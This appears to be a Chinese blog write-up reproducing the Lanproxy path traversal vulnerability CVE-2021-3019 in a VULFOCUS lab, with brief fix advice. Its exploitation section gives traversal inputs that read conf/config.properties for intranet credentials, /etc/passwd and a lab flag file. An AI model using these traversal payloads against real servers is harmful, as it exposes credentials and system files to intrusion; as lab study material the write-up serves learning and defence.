[文件读取]lanproxy 文件读取 (CVE-2021-3019)

1.1漏洞描述

|------|---------------|
| 漏洞编号 | CVE-2021-3019 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |

描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

1.2漏洞等级

高危

1.3影响版本

Lanproxy

1.4漏洞复现

1.4.1.基础环境

|----|-----------|
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
| | |

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址 :

1.5深度利用

1.5.1漏洞点

/../conf/config.properties

查看内部网连接的凭据

查看/etc/passwd

../../../../../etc/passwd

查看tmp/flag

../../../../../tmp/flag

拿到flag

flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级
  • 打补丁
  • 上设备
相关推荐
FairGuard手游加固3 分钟前
小游戏AssetBundle加密方案解析
安全·游戏
小白iP代理1 小时前
国内代理 IP 的类型:住宅 IP、机房 IP、移动 4G/5G IP 区别
网络·tcp/ip·5g
2501_927773071 小时前
Linux系统操作编程——http
网络·网络协议·http
猿java2 小时前
OAuth2是什么?它有哪些授权模式?
后端·安全·架构
深盾安全2 小时前
Android 应用核心代码加固思路
安全
薛定谔的旺财2 小时前
深度学习分类网络初篇
网络·深度学习·分类
wanhengidc2 小时前
云手机挂机掉线是由哪些因素造成的?
运维·服务器·网络·安全·智能手机
钢铁男儿3 小时前
Python 网络编程进阶:使用 SocketServer 模块构建 TCP 服务器与客户端
网络·python·tcp/ip
Teamhelper_AR3 小时前
AR智能巡检:智慧工地的高效安全新引擎
安全·ar
什么半岛铁盒3 小时前
处理端口和 IP 地址
网络·单片机·tcp/ip